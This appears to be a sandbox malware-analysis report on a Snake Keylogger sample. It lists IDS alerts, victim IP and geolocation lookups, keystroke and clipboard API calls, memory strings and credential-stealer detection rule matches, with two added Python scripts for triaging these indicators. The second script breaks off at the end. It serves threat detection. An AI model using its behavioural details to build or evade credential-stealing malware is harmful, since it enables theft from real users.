Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49714 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49726 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49734 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49710 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49765 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49746 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49754 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49713 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49740 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49729 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49759 -> 104.21.16.1:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_009022EE: InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000318A000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe2.exe.3.dr | String found in binary or memory: http://checkip.dyndns.org/q
Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | Strings found in binary or memory (the CRL, certificate and OCSP URLs of the Comodo/Sectigo code-signing and timestamping chain carried by EmbeddedExe1.exe, the same binary that carries the PuTTY project URL below; the trailing 0, 04, 06, 0y, 0t and 0# characters are the ASN.1 tag and length bytes that follow each URL inside the certificate, not part of the URL):
http://crl.comodoca.com/AAACertificateServices.crl04
http://crl.comodoca.com/AAACertificateServices.crl06
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
http://ocsp.comodoca.com0
http://ocsp.sectigo.com0
Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EmbeddedExe2.exe, 00000006.00000002.2310531102.000000000677A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe2.exe.3.dr | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189 (the address in the path is the analysis host's own public IP as returned by checkip, which the sample then geolocates; it is not attacker infrastructure)
Source: EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003104000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | String found in binary or memory: https://sectigo.com/CPS0
Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe1.exe, EmbeddedExe1.exe, 00000005.00000000.2180190361.00007FF75ED9A000.00000002.00000001.01000000.00000007.sdmp, EmbeddedExe1.exe, 00000005.00000002.3395994788.00007FF75ED9A000.00000002.00000001.01000000.00000007.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
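The checkip and reallyfreegeoip strings above are how Snake Keylogger fingerprints the victim: it fetches its own public IP from checkip.dyndns.org, then asks reallyfreegeoip.org/xml/<ip> for the country. The CRL, OCSP and CPS URLs are noise from the code-signing chain on EmbeddedExe1.exe. The script below is an added example, not part of the Joe Sandbox report: it triages the string list above (constructed inline, verbatim) into fingerprinting endpoints, PKI chain URLs and the rest, strips the ASN.1 bytes that string extraction appends to URLs embedded in certificates, and separates the victim IP so it is not mistaken for an indicator. The pattern table and function names are this example's own.

```python
"""Triage URL strings pulled from the memory dumps listed above (added example)."""
import re
from urllib.parse import urlparse

# Constructed input: the strings the report lists above, copied verbatim including the
# stray bytes that string extraction picks up after each URL.
REPORTED_STRINGS = [
    "http://checkip.dyndns.com",
    "http://checkip.dyndns.org",
    "http://checkip.dyndns.org/",
    "http://checkip.dyndns.org/q",
    "http://crl.comodoca.com/AAACertificateServices.crl04",
    "http://crl.comodoca.com/AAACertificateServices.crl06",
    "http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y",
    "http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0",
    "http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t",
    "http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#",
    "http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#",
    "http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#",
    "http://ocsp.comodoca.com0",
    "http://ocsp.sectigo.com0",
    "http://reallyfreegeoip.org",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "http://www.microsoft.",
    "https://reallyfreegeoip.org",
    "https://reallyfreegeoip.org/xml/",
    "https://reallyfreegeoip.org/xml/8.46.123.189",
    "https://reallyfreegeoip.org/xml/8.46.123.189$",
    "https://sectigo.com/CPS0",
    "https://www.chiark.greenend.org.uk/~sgtatham/putty/",
    "https://www.chiark.greenend.org.uk/~sgtatham/putty/0",
]

HOST = r"[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}"
# Each pattern captures the genuine URL; whatever follows is trailing garbage. Inside an
# Authenticode certificate a URL is followed by the next ASN.1 tag (0x30 = '0') and a
# length byte ('#', 'y', '4', ...), which is why CRL/OCSP URLs surface as '...crl0y'.
PATTERNS = [
    ("pki_chain", re.compile(rf"^https?://(?:crl|crt|ocsp)\.{HOST}(?:/[\w./-]+?\.(?:crl|crt|p7c))?", re.I)),
    ("pki_chain", re.compile(rf"^https?://{HOST}/CPS", re.I)),
    ("fingerprint", re.compile(r"^https?://checkip\.dyndns\.(?:org|com)/?", re.I)),
    ("fingerprint", re.compile(r"^https?://reallyfreegeoip\.org(?:/xml/(?:\d{1,3}(?:\.\d{1,3}){3})?)?", re.I)),
    ("project", re.compile(r"^https?://www\.chiark\.greenend\.org\.uk/~sgtatham/putty/", re.I)),
]
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def classify(s):
    """Return (label, canonical_url, trailing_garbage) for one extracted string."""
    for label, rx in PATTERNS:
        m = rx.match(s)
        if m:
            return label, m.group(0), s[m.end():]
    return "other", s, ""


def triage(strings):
    out = {"fingerprint_hosts": set(), "fingerprint_urls": set(), "victim_ips": set(),
           "pki_chain": set(), "project": set(), "other": [], "trailing": {}}
    for s in strings:
        label, url, tail = classify(s)
        if tail:
            out["trailing"][s] = tail
        if label == "fingerprint":
            parsed = urlparse(url)
            out["fingerprint_urls"].add(url)
            out["fingerprint_hosts"].add(parsed.hostname)
            # The IP in /xml/<ip> is the infected host's own public address, echoed back by
            # checkip and then geolocated; it identifies the victim, not the attacker.
            out["victim_ips"].update(IPV4.findall(parsed.path))
        elif label in ("pki_chain", "project"):
            out[label].add(url)
        else:
            out["other"].append(url)
    return out


def detection_scope(result):
    """Split the triage into what to alert on and what must stay off blocklists.
    checkip/reallyfreegeoip are public services: alert when a non-browser process resolves
    them, do not treat them as C2. CRL/OCSP hosts and the victim IP are never indicators."""
    pki_hosts = {urlparse(u).hostname for u in result["pki_chain"]}
    return {"alert_hosts": sorted(result["fingerprint_hosts"]),
            "do_not_block": sorted(pki_hosts | result["victim_ips"])}


if __name__ == "__main__":
    res = triage(REPORTED_STRINGS)
    for key in ("fingerprint_urls", "pki_chain", "project", "other"):
        print(key, sorted(res[key]))
    print("victim_ips", sorted(res["victim_ips"]))
    print(detection_scope(res))
```

The pattern-based canonicalisation is deliberate: generic "strip trailing junk" heuristics would also eat the `$`, `0` or `q` from a URL that legitimately ends that way, whereas matching the known shape of a CRL, OCSP or geo-IP URL and treating everything after it as garbage is lossless for the cases that matter here.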
Source: unknown | Network traffic detected: HTTP traffic on port 443, both directions of eight client connections (no process attribution): 49711 <-> 443, 49713 <-> 443, 49720 <-> 443, 49729 <-> 443, 49740 <-> 443, 49752 <-> 443, 49759 <-> 443, 49771 <-> 443
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_00904164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00904164
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB7060 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,SendMessageA | 5_2_00007FF75ECB7060
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB85D0 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,GlobalFree,GlobalFree | 5_2_00007FF75ECB85D0
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_00903F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00903F66
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008F001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_008F001C
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_0091CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0091CABC
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00BECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 2_2_00BECABC
(0_2_00903F66, 0_2_00904164 and 0_2_008F001C in the AutoIt dropper are consistent with the AutoIt3 interpreter's own ClipGet, ClipPut and Send routines, which every compiled AutoIt binary carries whether or not the script uses them; 0_2_0091CABC and 2_2_00BECABC are the same GUI control handler, with an identical call sequence, in 8kDIr4ZdNj.exe and in its dropped copy lecheries.exe. The keystroke capture of interest belongs to the Snake Keylogger payload identified in RegSvcs.exe and EmbeddedExe2.exe below, not to these stub functions.)

                  System Summary

Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Snake Keylogger (Author: ditekSHen)
Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Snake Keylogger (Author: ditekSHen)
Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Snake Keylogger (Author: ditekSHen)
Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
Source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTR | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Snake Keylogger (Author: ditekSHen)
Source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTR | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Snake Keylogger (Author: ditekSHen)
Source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTR | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Snake Keylogger (Author: ditekSHen)
Source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTR | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Snake Keylogger (Author: ditekSHen)
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPED | Matched rules: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown); Detects Encrial credential stealer malware (Author: Florian Roth); Detects executables with potential process hoocking (Author: ditekSHen); Detects Snake Keylogger (Author: ditekSHen)
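The rule matches above are listed per memory region, so the same payload shows up a dozen times. What an analyst wants is the per-process view: which processes carry Snake Keylogger code, and in which of them it was injected rather than loaded from disk. The script below is an added example, not part of the report: it parses the identifier shapes used above (`<proc>.<stage>.<image>.<base>.<n>.unpack`, the dotted `.sdmp` names, `Process Memory Space: <image> PID: <n>`, dropped-file paths), learns the process-index-to-image mapping from the `.unpack` names and applies it to the `.sdmp` ones, then pivots the hits per process. The input is a representative subset of the entries above, constructed inline. One assumption is stated in the code: that the fifth and seventh `.sdmp` fields hold the Win32 MEMORY_BASIC_INFORMATION Protect and Type values, which is not documented on this page but lines up with every identifier listed (0x40 and 0x40000 for the region injected into RegSvcs.exe, 0x02 and 0x1000000 for the on-disk image of EmbeddedExe2.exe). Function names are this example's own.

```python
"""Pivot the Yara matches listed above by analysis process (added example)."""
import re
from collections import defaultdict

# Constructed input: a representative subset of the 'Source ... Matched rule' entries above,
# as (source, type, rule) triples.
MATCHES = [
    ("3.2.RegSvcs.exe.8982ac.0.unpack", "UNPACKEDPE", "Windows_Trojan_SnakeKeylogger_af3faa65"),
    ("3.2.RegSvcs.exe.8982ac.0.unpack", "UNPACKEDPE", "Detects Encrial credential stealer malware"),
    ("3.2.RegSvcs.exe.700000.1.unpack", "UNPACKEDPE", "Detects Snake Keylogger"),
    ("2.2.lecheries.exe.42964ac.1.raw.unpack", "UNPACKEDPE", "Windows_Trojan_SnakeKeylogger_af3faa65"),
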